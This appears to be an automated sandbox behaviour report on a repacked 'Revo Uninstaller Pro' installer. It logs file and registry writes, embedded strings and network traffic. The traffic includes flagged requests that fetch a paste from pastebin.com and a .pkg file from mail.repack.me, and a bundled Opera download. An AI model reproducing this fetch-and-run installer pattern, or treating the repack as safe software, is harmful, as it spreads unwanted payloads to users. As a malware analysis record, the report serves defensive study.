        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller ProJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114003209.log
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114005402.log
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.9:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.9:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.9:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.110.216:443 -> 192.168.2.9:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.9:49719 version: TLS 1.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\x64\Release\revoflt.pdb source: rundll32.exe, 00000003.00000003.1633987388.000001994EEA8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: installer.exe.pdb source: setup.exe, 00000021.00000000.2125308793.0000000000D28000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_002EA2DF
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_002FAFB9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00309FD3 FindFirstFileExA,16_2_00309FD3
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_004069FF FindFirstFileW,FindClose,27_2_004069FF
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,27_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00402930 FindFirstFileW,27_2_00402930
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\Jump to behavior

        Networking

        barindex
        Source: unknownDNS query: name: pastebin.com
        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /raw/vkwZzU9B HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: pastebin.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /tsjtmfdm.pkg HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: mail.repack.meConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: net.geo.opera.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /me/ HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.opera.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: features.opera-api2.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: download.opera.comCache-Control: no-cache
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Googlehttps://www.bing.com/search?q=https://www.google.com/search?q=https://search.yahoo.com/search?p=Yahoohttps://duckduckgo.com/?q=DuckDuckGoSelectedEngineGeneral\WebSearchURL` equals www.yahoo.com (Yahoo)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MjViewTypeSort by column\RegBackup\Daily\\Steam\steam.exe--uninstall-app-id=Sort type64Microsoft .NETUpdate for Windows--profile-RedistMicrosoft Web DeployMicrosoft Visual C++Microsoft SQL ServerMicrosoft System CLRLast Full Backup/XOpenJDKURLInfoAbout /in "%s"\RevoAppBar.exe/I(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|ModifyPathI\data\cachedata.dat\data\OLDcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789\data\Prevcachedata.datOpen-ShellSOFTWARE\Microsoft\Installer\Products\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ProductIconInstaller\Products\PotPlayerctor.dllSlowInfoCacheantamedia hotspotInstallDateSystemComponent\Installer\UserData\MsiExec.exe /X%02d.%02d.%dPublisherDisplayIconInstallLocationParentKeyName\InstallPropertiesHelpLinkCommentsSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\WindowsInstallerSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\\Products\cachedata.datEstimatedSizeMsiExec.exe\data\' AND RDN LIKE '' AND RPVer LIKE '%d.%dSELECT * FROM ILogs WHERE RKey=' /i /x /I /XQuietUninstallString"%s" /S %s%s /quiet%s /qn\contrast-black\.scale-400%s /S_contrast-blackx 64x 86.targetsize-256UninstallSection%d64bit32bitx-64x-86(x64 edition)(x86 edition)64 bit32 bitMicrosoft Edge WebView2 Runtimex64 editionx86 edition equals www.facebook.com (Facebook)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ViewType\RegBackup\Daily\\Steam\steam.exe64Sort typeSort by columnMicrosoft .NETRedist--profile---uninstall-app-id=Microsoft Web DeployMicrosoft System CLRMicrosoft SQL ServerUpdate for WindowsLast Full BackupURLInfoAboutOpenJDKMicrosoft Visual C++ /in "%s"(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|/I/XModifyPath\data\OLDcachedata.dat\data\cachedata.dat\RevoAppBar.exe\data\Prevcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789I equals www.facebook.com (Facebook)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bing.com/search?q=YahooGooglehttps://www.google.com/search?q=https://duckduckgo.com/?q=General\WebSearchhttps://search.yahoo.com/search?p=DuckDuckGoSelectedEngineURL` equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: pastebin.com
        Source: global trafficDNS traffic detected: DNS query: mail.repack.me
        Source: global trafficDNS traffic detected: DNS query: net.geo.opera.com
        Source: global trafficDNS traffic detected: DNS query: autoupdate.opera.com
        Source: global trafficDNS traffic detected: DNS query: autoupdate.geo.opera.com
        Source: global trafficDNS traffic detected: DNS query: desktop-netinstaller-sub.osp.opera.software
        Source: global trafficDNS traffic detected: DNS query: features.opera-api2.com
        Source: global trafficDNS traffic detected: DNS query: download.opera.com
        Source: global trafficDNS traffic detected: DNS query: download3.operacdn.com
        Source: unknownHTTP traffic detected: POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.geo.opera.comContent-Length: 656Cache-Control: no-cache
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http:////file:////www.web.OS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
